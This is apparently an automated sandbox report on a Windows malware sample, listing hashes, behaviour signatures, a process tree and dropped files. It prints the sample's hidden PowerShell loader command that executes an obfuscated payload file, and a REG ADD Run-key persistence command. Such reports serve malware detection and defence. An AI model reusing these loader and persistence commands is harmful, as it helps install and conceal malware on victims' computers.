Analysis

  • max time kernel
    145s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    23-05-2024 01:39

General

  • Target

    74e64ac4e30e760332d456eb22f9c287a378653566cf4eac6278c4576c2d5cf9.exe

  • Size

    427KB

  • MD5

    2ceb634eba1c56c9dcf5daa8c78ebc92

  • SHA1

    8c101631d550b07502f5e077b33d4142d6323a5d

  • SHA256

    74e64ac4e30e760332d456eb22f9c287a378653566cf4eac6278c4576c2d5cf9

  • SHA512

    042d3249ae6863ff90caae3001258e80a3e92f9abc8dbfb1ac0eb48dfcef7c72686a677a70c554a2a620680319aba93058d22c71b306252530f51cb874131caa

  • SSDEEP

    6144:W9X0GVlmkDWa5rfgmIOVXAk85ltRn8j7r85ugCDo4pr3WWPC1LiJ1Km9:Y02FCa5M2m5LRnKg5D4pr3WrMJ1Km9

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\74e64ac4e30e760332d456eb22f9c287a378653566cf4eac6278c4576c2d5cf9.exe
    "C:\Users\Admin\AppData\Local\Temp\74e64ac4e30e760332d456eb22f9c287a378653566cf4eac6278c4576c2d5cf9.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2928
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Undertrykt=Get-Content 'C:\Users\Admin\AppData\Local\Temp\rumfangsformlers\mettemaries\Stningsstrukturers.Rec';$Sludrehoved=$Undertrykt.SubString(60222,3);.$Sludrehoved($Undertrykt)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2320
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
        3⤵
          PID:2740
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of WriteProcessMemory
          PID:2692
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Claybank" /t REG_EXPAND_SZ /d "%Sergius% -windowstyle minimized $metensomatosis=(Get-ItemProperty -Path 'HKCU:\Marveller\').Scaldic;%Sergius% ($metensomatosis)"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3036
            • C:\Windows\SysWOW64\reg.exe
              REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Claybank" /t REG_EXPAND_SZ /d "%Sergius% -windowstyle minimized $metensomatosis=(Get-ItemProperty -Path 'HKCU:\Marveller\').Scaldic;%Sergius% ($metensomatosis)"
              5⤵
              • Adds Run key to start application
              • Modifies registry key
              PID:2676

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      2ed0c47cb75927f5fe4f205b37532170

      SHA1

      d00796d27856ef0a8e035a32d19c3f8242bf5094

      SHA256

      f98cfe8c1043e090d3a7b4ee47d15311b0c83a80f88f9ca2781f116879285422

      SHA512

      863053294d28877fe5bbddb698698e5331d03675b7a221baf195c3d4376d6e697e7ed9550be46f3ebe9364757206392f8830d20da4a21ae5255bc8f0637471df

    • C:\Users\Admin\AppData\Local\Temp\Cab800B.tmp

      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

    • C:\Users\Admin\AppData\Local\Temp\Tar807B.tmp

      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

    • C:\Users\Admin\AppData\Local\Temp\rumfangsformlers\mettemaries\Stningsstrukturers.Rec

      Filesize

      58KB

      MD5

      dd200d8c3c09458738a4ee7d421a891b

      SHA1

      5821db55a8a2e95c67411c18893530d9c3cd47c6

      SHA256

      0e5ad13c4627a6fcb258cbcf2e67bde5ac0f66b8e85291ba05dacc5021eeb4df

      SHA512

      a2faef0cb547f0ee91ca5b45893300fc18943d1389f593bf2b58f557d8e85f7346e55be8a592c87e6e32dc98f9d568a05e59cc7d93b9288391c0465b6a68f39d

    • C:\Users\Admin\AppData\Local\Temp\rumfangsformlers\mettemaries\Understrmmes.Teg

      Filesize

      314KB

      MD5

      919a448703aa1422caf492b3efe5511f

      SHA1

      cdb804083bd4ce2b5aef89bbc85bbcff9b25b041

      SHA256

      86291eed6935825b6d1a58b2f7e786cc9771e560e10c29c4e3c9c5e848a1fe70

      SHA512

      c6950b84f08b9c5e2d38b4b0b5717d3196e76c28da6491e421beb829460ad0f2c6f10e9e1f67d7aae0a434ae5492f60e22cc656924d52c8fe45a71b1824bca11

    • memory/2320-11-0x0000000073EF0000-0x000000007449B000-memory.dmp

      Filesize

      5.7MB

    • memory/2320-7-0x0000000073EF1000-0x0000000073EF2000-memory.dmp

      Filesize

      4KB

    • memory/2320-14-0x00000000066E0000-0x0000000009A45000-memory.dmp

      Filesize

      51.4MB

    • memory/2320-10-0x0000000073EF0000-0x000000007449B000-memory.dmp

      Filesize

      5.7MB

    • memory/2320-9-0x0000000073EF0000-0x000000007449B000-memory.dmp

      Filesize

      5.7MB

    • memory/2320-8-0x0000000073EF0000-0x000000007449B000-memory.dmp

      Filesize

      5.7MB

    • memory/2320-92-0x0000000073EF0000-0x000000007449B000-memory.dmp

      Filesize

      5.7MB

    • memory/2692-93-0x0000000000620000-0x0000000001682000-memory.dmp

      Filesize

      16.4MB